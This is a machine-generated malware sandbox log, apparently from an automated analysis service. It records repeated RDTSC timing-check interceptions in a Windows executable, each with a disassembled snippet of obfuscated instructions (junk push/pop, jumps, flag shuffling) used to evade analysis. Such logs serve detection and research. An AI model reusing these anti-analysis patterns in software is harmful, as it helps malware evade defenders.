Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75401B5 second address: 75401BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75401BB second address: 75401CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75401CC second address: 75401D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75401D2 second address: 75401E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75401E3 second address: 754021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4464DAB8D1h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4464DAB8CDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754021C second address: 7540221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540221 second address: 7540260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4464DAB8CDh 0x0000000a sub esi, 02C60896h 0x00000010 jmp 00007F4464DAB8D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [775606ECh] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edx, cx 0x00000025 mov esi, 360C6F1Bh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540260 second address: 75402DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4464F4BF27h 0x00000009 and al, 0000007Eh 0x0000000c jmp 00007F4464F4BF29h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 test esi, esi 0x00000017 jmp 00007F4464F4BF1Dh 0x0000001c jne 00007F4464F4CF16h 0x00000022 jmp 00007F4464F4BF1Eh 0x00000027 xchg eax, edi 0x00000028 pushad 0x00000029 mov al, 42h 0x0000002b jmp 00007F4464F4BF23h 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75402DD second address: 75402E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75402E1 second address: 75402E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75402E7 second address: 75402ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75402ED second address: 75402FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75402FB second address: 7540384 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4464DAB8D3h 0x00000008 or si, CFFEh 0x0000000d jmp 00007F4464DAB8D9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F4464DAB8D0h 0x0000001b adc ch, FFFFFFF8h 0x0000001e jmp 00007F4464DAB8CBh 0x00000023 popfd 0x00000024 popad 0x00000025 call dword ptr [77530B60h] 0x0000002b mov eax, 756AE5E0h 0x00000030 ret 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F4464DAB8D4h 0x00000038 and esi, 7A65C158h 0x0000003e jmp 00007F4464DAB8CBh 0x00000043 popfd 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540384 second address: 75403AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push 00000044h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4464F4BF1Ch 0x00000011 sub eax, 0A5CCBB8h 0x00000017 jmp 00007F4464F4BF1Bh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75403AE second address: 75403B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75403B2 second address: 75403CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 call 00007F4464F4BF24h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75403CF second address: 7540458 instructions: 0x00000000 rdtsc 0x00000002 mov dh, 86h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 jmp 00007F4464DAB8CAh 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f call 00007F4464DAB8CEh 0x00000014 pushfd 0x00000015 jmp 00007F4464DAB8D2h 0x0000001a and si, 67A8h 0x0000001f jmp 00007F4464DAB8CBh 0x00000024 popfd 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F4464DAB8D9h 0x0000002c or ecx, 730B53C6h 0x00000032 jmp 00007F4464DAB8D1h 0x00000037 popfd 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F4464DAB8CCh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540458 second address: 754048A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edi, 1A442BD6h 0x00000011 pop edi 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 push dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4464F4BF22h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754048A second address: 754049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464DAB8CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754049C second address: 75404A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75404A0 second address: 75404B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f mov dl, 1Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, 2722B53Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75404D8 second address: 75404DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75404DC second address: 75404EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75404EF second address: 7540507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540507 second address: 7540523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 push ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540523 second address: 754053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754053B second address: 7540565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4464DAB8D5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540565 second address: 7540575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540575 second address: 75405B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F44D4D4A9F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4464DAB8CFh 0x00000017 sub si, A5FEh 0x0000001c jmp 00007F4464DAB8D9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75405B6 second address: 75405FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F4464F4BF27h 0x00000010 mov dword ptr [esi], edi 0x00000012 pushad 0x00000013 call 00007F4464F4BF24h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75405FD second address: 7540606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540606 second address: 754060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754060A second address: 7540684 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4464DAB8CDh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F4464DAB8D7h 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F4464DAB8D4h 0x0000001d or ecx, 55E44B48h 0x00000023 jmp 00007F4464DAB8CBh 0x00000028 popfd 0x00000029 jmp 00007F4464DAB8D8h 0x0000002e popad 0x0000002f mov dword ptr [esi+0Ch], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540684 second address: 7540688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540688 second address: 75406A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75406A5 second address: 75406CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4464F4BF1Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75406CC second address: 754071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4464DAB8D3h 0x00000015 add ecx, 74A5665Eh 0x0000001b jmp 00007F4464DAB8D9h 0x00000020 popfd 0x00000021 mov ah, 47h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754071E second address: 7540748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4464F4BF27h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540748 second address: 754076E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754076E second address: 7540772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540772 second address: 7540778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540778 second address: 754078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754078D second address: 754079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754079E second address: 75407A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75407A2 second address: 75407B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75407B8 second address: 75407CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, 4BB25A16h 0x00000013 mov eax, edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75407CE second address: 75407D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75407D4 second address: 75407D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75407D8 second address: 75407DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540A18 second address: 7540A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540A32 second address: 7540A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F4464DAB8D3h 0x00000014 add ecx, 77DF2C9Eh 0x0000001a jmp 00007F4464DAB8D9h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540A74 second address: 7540A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, A4h 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540A86 second address: 7540A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540A96 second address: 7540B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4464F4BF21h 0x00000009 sbb si, 4436h 0x0000000e jmp 00007F4464F4BF21h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+38h], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F4464F4BF29h 0x00000023 and eax, 41421046h 0x00000029 jmp 00007F4464F4BF21h 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+1Ch] 0x00000033 jmp 00007F4464F4BF1Eh 0x00000038 mov dword ptr [esi+3Ch], eax 0x0000003b pushad 0x0000003c call 00007F4464F4BF1Dh 0x00000041 mov ax, 30D7h 0x00000045 pop ecx 0x00000046 popad 0x00000047 mov eax, dword ptr [ebx+20h] 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540B2F second address: 7540B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540B33 second address: 7540B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540B39 second address: 7540B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4464DAB8D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540B6E second address: 7540BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5668F2A2h 0x00000008 pushfd 0x00000009 jmp 00007F4464F4BF23h 0x0000000e or ch, FFFFFF9Eh 0x00000011 jmp 00007F4464F4BF29h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebx+00000080h] 0x00000020 pushad 0x00000021 mov si, C303h 0x00000025 mov ecx, 1A008C5Fh 0x0000002a popad 0x0000002b push 00000001h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540BC3 second address: 7540BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540BC9 second address: 7540BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4464F4BF27h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540BFD second address: 7540C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d pushfd 0x0000000e jmp 00007F4464DAB8D3h 0x00000013 and al, FFFFFFCEh 0x00000016 jmp 00007F4464DAB8D9h 0x0000001b popfd 0x0000001c popad 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540C56 second address: 7540C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4464F4BF29h 0x0000000a adc ax, 74B6h 0x0000000f jmp 00007F4464F4BF21h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540C8C second address: 7540CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F4464DAB8CEh 0x00000011 nop 0x00000012 jmp 00007F4464DAB8D0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov cx, 4E13h 0x0000001f mov dx, ax 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540CCF second address: 7540CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464F4BF20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540D29 second address: 7540D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540D2F second address: 7540D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540D35 second address: 7540D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007F4464DAB8D0h 0x00000017 adc si, 63B8h 0x0000001c jmp 00007F4464DAB8CBh 0x00000021 popfd 0x00000022 popad 0x00000023 js 00007F44D4D4A220h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007F4464DAB8CBh 0x00000031 call 00007F4464DAB8D8h 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540D97 second address: 7540D9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540D9C second address: 7540DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4464DAB8CCh 0x0000000a and ecx, 6E518878h 0x00000010 jmp 00007F4464DAB8CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebp-0Ch] 0x0000001c jmp 00007F4464DAB8D6h 0x00000021 mov dword ptr [esi+04h], eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540DE3 second address: 7540E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F4464F4BF28h 0x0000000b mov bl, cl 0x0000000d pop ebx 0x0000000e popad 0x0000000f lea eax, dword ptr [ebx+78h] 0x00000012 jmp 00007F4464F4BF1Ah 0x00000017 push 00000001h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4464F4BF1Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E22 second address: 7540E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E31 second address: 7540E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop ecx 0x0000000e mov ah, dh 0x00000010 popad 0x00000011 rdtsc
